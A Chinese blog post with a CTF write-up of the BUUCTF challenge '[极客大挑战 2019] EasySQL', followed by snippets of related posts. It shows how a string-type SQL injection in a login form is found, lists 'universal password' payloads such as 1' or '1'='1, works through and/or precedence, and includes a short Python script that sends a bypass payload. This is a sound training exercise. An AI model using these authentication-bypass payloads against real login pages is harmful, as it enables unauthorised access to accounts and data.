【极客大挑战 2019】EasySQL

最新推荐文章于 2025-06-16 14:17:03 发布
原创 最新推荐文章于 2025-06-16 14:17:03 发布 · 1w 阅读 · 74 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#web安全

本文探讨了SQL注入漏洞中的字符型注入,通过分析正常查询的回显和错误报错信息,揭示了注入的原理。利用万能钥匙测试,展示了如何通过 payload 判断注入点,并解释了 `and` 和 `or` 的逻辑优先级在构造查询语句中的应用。最后,列举了不同解法的payload实例,强调了利用条件判断实现注入的可能性。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

[极客大挑战 2019] EasySQL

判断是数字还是字符型注入

image-20220501231955285

正常查询的回显

image-20220501232042283

输入字符型判断一下,发现报错了,看报错显示 ‘1’‘’,输入的是1’,这里查询语句中应该是存在一个单引号的,所以这里报错了,多了一个单引号,说明这里存在字符型的注入,先用万能钥匙测测

image-20220501233358022

image-20220501232207377

使用万能钥匙一测,第一次 正常回显错误,然后又用字符型的测了一下,发现这里的报错中带有 一部分的查询语句

# 万能公式
1 and 1=1
1' and '1'='1
1 or 1=1 
1' or '1'='1

image-20220501233605186

image-20220501233123354

为什么用 1’ and ‘1’='1不行呢?

image-20220501233653085

image-20220501233736334

测试的时候输入了 1’ and ‘1’=1这个有问题的payload,看报错信息中带有一个 and password=‘1’ and ‘1’=1 说明sql语句是SELECT * FROM tables WHERE username=‘1’ and ‘1’=1 and password=‘1’ and ‘1’=1 类似这样的查询,and 的两边同时为TRUE 结果才能为 TRUE,所以输入的payload一定要符合这个条件就可以登录成功了。

# payload
SELECT * FROM tables WHERE username='1' or '1'='1' and password='1' or '1'='1'
# 优先级排序:and 优先级高于 or,所以要计算 and 然后再计算 or
username='1'--->false
'1'='1'---> true
passwrod='1'--->false
'1'='1'--->true
false or (true and false) or true
false or false or true
false or true
#得出结果:true

image-20220501233806321

照这种方法就可以推算出不同的解法

# payload1
# 用户名:1' and '1'='1
# 密码:1' or '1'='1

# payload2
# 用户名:1' and '1'='2
# 密码:1' or '1'='1

# 本质上都是利用 and 和 or 的优先级进行判断,只要返回 TRUE 就没问题
[极客挑战 2019]EasySQL1
lljiuhkhk的博客
07-20 2884
CTF,sql注入,web渗透,安全入门
BUUCTF在线测评之[极客挑战 2019]EasySQL 1
weixin_49182737的博客
03-03 5693
启动靶机 只给了一个地址,点击进去即是靶机 可以看到这是一个登录页面 虽然靶机信息那已经提示我们这是一个EasySql,结合靶机页面是登录页面,把八九不离十的可以确定这一题是考察SQL注入的,并且Easy提示我们,是简单的sql注入。 BUT出于一个网安爱好者的心态,我们还是要简单看一下这个页面的信息,说不定出题者挖坑呢 。。。 虽然结果是然并卵 所以还是老老实实听提示试sql注入吧 这里安利一下firefox,这浏览器可以在拓展里装Hackbar,一款房间寻找web安全bug的插件 一个不太好的信息时
web-[极客挑战 2019]EasySQL
wojiushilsy的博客
04-16 544
题目要点题目内容解题 题目要点 SQL注入—万能密码 题目内容 解题 打开链接是一个登陆界面 最开始我认为用户名就是cl4y 只是在试密码 输入单引号'以后报错,应该是字符型注入 万能密码试一试 ????,成功 后面又试了试,用户名只要不是空,用万能密码都可以登录。 ...
BUUCTF在线评测-练习场-WebCTF习题[极客挑战 2019]LoveSQL1-flag获取、解析
最新发布
m0_56970656的博客
06-16 1018
打开靶场,页面有点熟悉,上次是简单Sql,在下面链接:BUUCTF在线评测-练习场-WebCTF习题[极客挑战 2019]EasySQL1-flag获取、解析_buuctf easysql 1-优快云博客根据提示,我估计是跟上次比较像,flag可能放在另一个地方了。那么老规矩,直接单引号测试法 可以看到单引号被url编码了,但是没什么关系,并没有做什么过滤观测报错,我们发现是密码部分报错,并且我们输入的123后面多了双引号,前面多个了引号。说明什么?password闭合是双引号,username是单
[极客挑战 2019]EasySQL
weixin_55026246的博客
08-01 256
[极客挑战 2019]EasySQL
[极客挑战2019]easysql
weixin_43952190的博客
04-22 1377
easysql 进入后这样的页面,正常用’会报错,然后用burp扫一下。 尽然就出来了! 原来要用万能密码就行了,现在总结一下 万能密码: asp aspx万能密码 1: "or “a”="a 2: ‘.).or.(’.a.’=’.a 3: or 1=1– 4: 'or 1=1– 5: a’or’ 1=1– 6: "or 1=1– 7: 'or.‘a.’...
Buuctf-Web-[极客挑战 2019]EasySQL 1 题解及思路总结
ccc6553584的博客
04-03 1119
输入11"时,没有SQL语句报错,只是提示我们输入的值是不对的,因此我们可以先假设SQL语句闭合方式是单引号username输入1时,形成的sql语句是username输入1"时,形成的sql语句是正确的当字符串内需要包含双引号时,除了使用转义字符外,也可以使用一对单引号来包括字符串。字符串内的双引号被视为普通字符,无需特殊处理同理,当字符串内需要包含单引号时,除了使用转义字符外,也可以使用一对双引号来包括字符串。字符串内的单引号被视为普通字符,无需特殊处理username输入的是1'
BUUCTF | Web [极客挑战 2019]EasySQL-- BUUOJ WriteUP
zxsctf的博客
07-15 487
测试的时候输入了1’and‘1’=1这个有问题的payload,看报错信息中带有一个andpassword=‘1’and‘1’=1说明sql语句是SELECT*FROMtablesWHEREusername=‘1’and‘1’=1andpassword=‘1’and‘1’=1类似这样的查询,and的两边同时为TRUE结果才能为TRUE,所以输入的payload一定要符合这个条件就可以登录成功了。我们要从最简单的题目开始做起,一点一点的培养我们的网络安全技术。...
01 [极客挑战 2019]EasySQL
weixin_60937978的博客
04-23 2677
万能密码 1.解释 密码前要有单引号,来闭合SQL语句中的单引号,然后构造一个or,即或者 1=1,来构造出新的密码,即:'or'1'='1 密码最后为什么没有单引号:为了使SQL 语句不出错,用来闭合程序SQL语句后面的单引号,再加一个,会出错。 万能密码合集 asp aspx万能密码 1:”or “a”=”a 2: ‘)or(‘a’=’a 3:or 1=1– 4:’or 1=1– 5:a’or’ 1=1– 6:”or 1=1– 7:’or’a’=’a 8:...
极客挑战2019-EasySQL
qq_53689523的博客
02-06 834
根据题目判断,是一个sql注入题目,而且应该是绕过登录的用户名和密码就可以正常登录。1.题目提示是一个sql注入题目,登录查看。GET传参,所以我们猜测其后端代码概为。然后发现直接绕过成功了,无语。1.判断是否存在注入点。2.Brup抓包分析。
[极客挑战 2019]EasySQL【SQL注入】
weixin_38832257的博客
08-13 1407
题目名称:[极客挑战 2019]EasySQL题目平台:BUUCTF题目类型:Web考察知识点:SQL注入。
[极客挑战 2019]easysql 3
12-28
### 极客挑战 2019 EasySQL3 解决方案 针对极客挑战 2019 中的 EasySQL3 题目,该题目涉及 SQL 注入漏洞利用。此类型的攻击通常发生在应用程序未能正确处理用户输入的情况下。 #### 易受攻击的应用程序特性 易受攻击的应用程序具有两个主要特征: - 用户可以控制某些参数并提交这些参数到服务器端脚本。 - 应用程序会基于用户的输入构建和执行 SQL 查询语句[^2]。 #### 实际操作过程中的技术细节 对于此类问题的一个常见解决方案是通过构造特定形式的数据来触发错误或绕过验证逻辑。例如,在登录表单中使用 `' OR '1'='1` 这样的字符串作为用户名或密码字段的内容,这可能会使条件始终为真从而实现未授权访问[^4]。 然而,具体到 EasySQL3 的情况,可能还需要考虑更复杂的场景,比如联合查询 (`UNION`) 或者其他高级技巧来进行数据提取。如果存在报错注入,则可以通过调整请求直到获得有用的反馈信息为止;之后再依据返回的信息进一步优化payload以获取所需的结果[^3]。 需要注意的是,实际比赛中应当遵循比赛规则以及道德准则,合法合规地完成解题任务。 ```python import requests url = "http://example.com/check.php" data = { 'username': "' OR '1'='1", 'password': "" } response = requests.post(url, data=data) if "success" in response.text.lower(): print("Login successful with payload.") else: print("Failed to login using the given payload.") ```
评论 5
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

iKnsec

您的鼓励,是我创作的动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值